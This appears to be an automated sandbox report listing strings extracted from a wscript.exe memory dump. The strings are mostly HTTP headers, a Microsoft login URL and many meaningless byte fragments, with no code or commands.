Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: common start menu	memstr_b79f3908-6
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: https://login.live.comi	memstr_428bbef2-e
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: content-typeapplication/jsonx	memstr_c2eebef4-0
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: transfer-encodingchunked	memstr_45f02304-4
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: varyaccept-encoding	memstr_f81f9d7d-0
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: access-control-allow-origin*#	memstr_ea062973-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: x-ratelimit-limit10000e	memstr_499fb8d9-a
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: x-ratelimit-remaining9994	memstr_54cac7ff-9
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: x-powered-byoctolus	memstr_18d457bc-6
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: x-content-type-optionsnosniff2	memstr_ed4ffffd-c
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: x-content-type-optionsnosniff{	memstr_e0fca49a-5
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: x-xss-protection1; mode=block	memstr_3a41786e-0
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cf-cache-statusdynamic	memstr_c7c2f23d-6
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: report-to{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=utccvfz9igex8ugulmyucbk%2fdo2exohao1lqoh0aaktkf2nxluaj9ydxt1927xi5qx8uvcex89hwistsu9wdwc4klzjx9ocqzuxsoh2iujajdqzsmkmmp4bc0vkjson38t6ya%2b%2bn"}],"group":"cf-nel","max_age":604800}2	memstr_29b6b27d-9
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nel{"success_fraction":0,"report_to":"cf-nel","max_age":604800}	memstr_ff742ddd-2
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: <nel{"success_fraction":0,"report_to":"cf-nel","max_age":604800}	memstr_2dbdaed9-1
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cf-ray881c5a21bd068f4d-ord	memstr_ed6be1ee-2
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: alt-svch3=":443"; ma=86400	memstr_46b3ac77-6
Source: wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nqs[\	memstr_86d80b66-b
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: jk$	memstr_f38dcf7a-1
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k-k	memstr_ddc8b3a3-6
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k&kdf	memstr_7fe92d0e-2
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'k*kp'	memstr_53d3d3d0-b
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k+k	memstr_3a405f33-5
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +k,k,x	memstr_f2ee5fb3-f
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k,k	memstr_5a31fc7d-4
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: p.k3kl	memstr_52ca87f7-a
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cgj3k	memstr_3c0dcce0-c
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t4kfk`	memstr_d74d62e1-1
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 9k@kdf	memstr_8d01a20d-9
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: akdkx'9kek	memstr_0fa08bc6-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ekfktx	memstr_5114f392-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: jfk}kl	memstr_263ff04e-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ikpk	memstr_bbd202f9-a
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qkzkd@	memstr_9deded22-5
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'ikzk(	memstr_5bf6ad4c-6
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [k`kx@	memstr_82fd308f-6
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'ik`kp	memstr_91b55890-6
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: akgk	memstr_00d8f450-a
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'ikgk	memstr_f93bb278-d
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hkokdf	memstr_33eeeeba-8
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pkrk$'hksk	memstr_3a70af83-a
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sktk	memstr_a06ec33e-4
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &iktk	memstr_47939549-5
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wk\|k ik\|k$	memstr_8568f131-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n}kal	memstr_92f5444e-b
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: v~kfl	memstr_3b8ec1ae-a
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: y~kfl	memstr_ffba9501-8
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kfl	memstr_cfcf7b68-b
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k)l	memstr_1d57c9d0-7
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l"ldf	memstr_bb74250c-f
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #l&lu'	memstr_57eeddfd-a
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l'l	memstr_f1680b3e-6
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'l(l	memstr_32d8fd90-1
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (l)l	memstr_4a478861-2
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l)l,	memstr_9f92e52b-f
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k*l	memstr_b7377c5b-2
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +l7l	memstr_73348ee4-1
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8l?ldf	memstr_83500dd1-e
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @lclw'8ldl	memstr_3d0e7042-2
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dlel	memstr_c979cd32-5
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &+lel	memstr_982db9d2-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kel	memstr_40eb6b3e-7
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wflol	memstr_d8a66a6b-4
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllnl<	memstr_7f1d55f3-1
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nolql	memstr_a9e84369-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rlyl	memstr_8919fa28-a
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: zl^l	memstr_fe3eeb98-1
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'rl^l	memstr_43e30f1c-f
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &rl`l	memstr_d68ed7fb-1
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c~k`l	memstr_1c1719ad-f
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: glsl	memstr_08bf1877-d
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tl{ldf	memstr_da71538e-7
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lw'tl	memstr_82235e5a-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m(m	memstr_a9f0e031-a
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m"mdf	memstr_ff0899e6-6
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #m&m{'	memstr_b7afec9f-3
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m'm	memstr_ee663be1-f
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'm(m`z	memstr_50ace15c-d
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (m3m	memstr_d83cbe3e-f
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4m7m	memstr_7bdfac5b-a
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8m9m	memstr_72cf7483-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: '4m:ml	memstr_39964709-8
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :m;m	memstr_bda3f9a2-e
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &(m;mx	memstr_6326983a-4
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: p<maml	memstr_14c4bf3a-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c(mam	memstr_a5c7e546-2
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tbmtmh	memstr_0d8d0710-7
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gmnmdf	memstr_c6af875b-4
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: omrm\|'gmsm@	memstr_39864398-7
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: smtm	memstr_16b5534b-9
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tmym,e	memstr_8a35d82d-2
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [m^m	memstr_e74802c9-9
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _m`m	memstr_f4bb12d6-e
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: '[mam	memstr_7279ac2e-7
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ambm	memstr_85262ed8-e
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (tmam	memstr_9a8ad589-d
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bmgm	memstr_068795dc-e
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: immm	memstr_2bb6440f-5
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nmsm,e	memstr_a640ab0d-4
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &imtm4	memstr_f03772ed-9
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (bmtm	memstr_f47d9650-4
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ctmtm	memstr_6ad0e6dc-b
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pumzml	memstr_e16c567f-f
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cbmzmx	memstr_491280a7-9
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c8>g>`	memstr_b7a7459b-9
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m"p	memstr_51c87456-9
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n ndf	memstr_9ef5b5dc-7
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: !n$n~'	memstr_04355aa9-2
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n%n	memstr_3b4b8182-7
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %n&n	memstr_99acaf80-2
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &n(n8[	memstr_221751b5-9
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n.n	memstr_b6325e30-9
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: )n.nc&n.n<	memstr_3830f4b0-6
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n/n	memstr_c2431dc6-c
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m/n	memstr_e17ddf32-4
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0n1n	memstr_3fc5d81d-f
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2nbnl3	memstr_824e1852-8
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: '0nbn	memstr_e4c8ef00-3
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cnjndf	memstr_04fbbb95-4
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: knnn	memstr_30bd5a66-3
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'cnon	memstr_57d74d8b-a
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: onpn	memstr_001d2a4e-f
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pnwndf	memstr_e08ea12c-3
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: xn[n	memstr_2d1f18d8-e
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'pn\nl	memstr_3e7d812e-2
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \n]n	memstr_75f9fccb-1
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ccn\n<	memstr_8f8f560e-1
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &0n]n	memstr_c58427c3-a
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n]n	memstr_f1041d93-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ^n_n	memstr_ad77202f-c
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: `ndn	memstr_3d116d1d-3
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: '^ndn	memstr_bc3814d9-9
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &^nfn@	memstr_e5dc6d91-9
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c0nfn	memstr_9bfc776c-6
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: jnwn	memstr_c7b56e86-a
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nso	memstr_f3ee092d-2
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: oodf	memstr_be9b8771-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o ox\	memstr_5358b412-5
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o o	memstr_dc9857c0-8
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o"o	memstr_67eab5fd-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #o$o\	memstr_78c2ca45-e
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %o*o	memstr_dc089b9e-c
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: '#o*o4	memstr_3b941111-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +o,o	memstr_2f0ddec2-8
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -o9o	memstr_ef6585ec-6
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: '+o9ox	memstr_a7662072-2
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &#o:o\	memstr_fb57ce1d-b
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o:o	memstr_256bc01e-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;o<o\	memstr_e5d6c506-3
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: =ogo	memstr_9ed9589c-8
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ';ogo	memstr_268ebe7b-b
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: horo	memstr_6a3bb8f2-9
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: to[odf	memstr_13be9366-9
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \o^o6'to_ol	memstr_5295fb35-d
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _o`otj	memstr_917dc90b-a
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ho_o8	memstr_23c98c0e-5
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &;o`o	memstr_b91e76fd-8
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c#o`o	memstr_0b2ede7f-d
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: aobo\	memstr_4cc1cf87-d
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: coho	memstr_2e7a2f18-8
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 'aoho	memstr_29ff176a-7
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &aojo	memstr_42d947be-0
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c;ojo	memstr_2a5eb701-1
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kolo\	memstr_e61f48b1-d
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: noro(korot	memstr_167b7f79-7
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: caoro<	memstr_b0e9b1f3-2
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wso\|o	memstr_23ea06f2-5
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dyo{o	memstr_b3676f9c-c
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n\|o~o	memstr_31397bfd-9
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: p!p	memstr_04c5fe37-e
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m!p	memstr_39beb15b-4
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: g!p"pc	memstr_395a663b-9
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: p"pd	memstr_9ad24274-9
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @"p*pl{	memstr_89ed91cb-b
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c\>"px	memstr_384121d9-3
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +p6p	memstr_1e56bd4f-2
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: d 6p7p	memstr_2832f4b3-8
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: d7p9p	memstr_811ea217-b
Source: wscript.exe, 0000000C.00000003.2094532677.0000000005D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: d;pgp	memstr_57d17e74-3
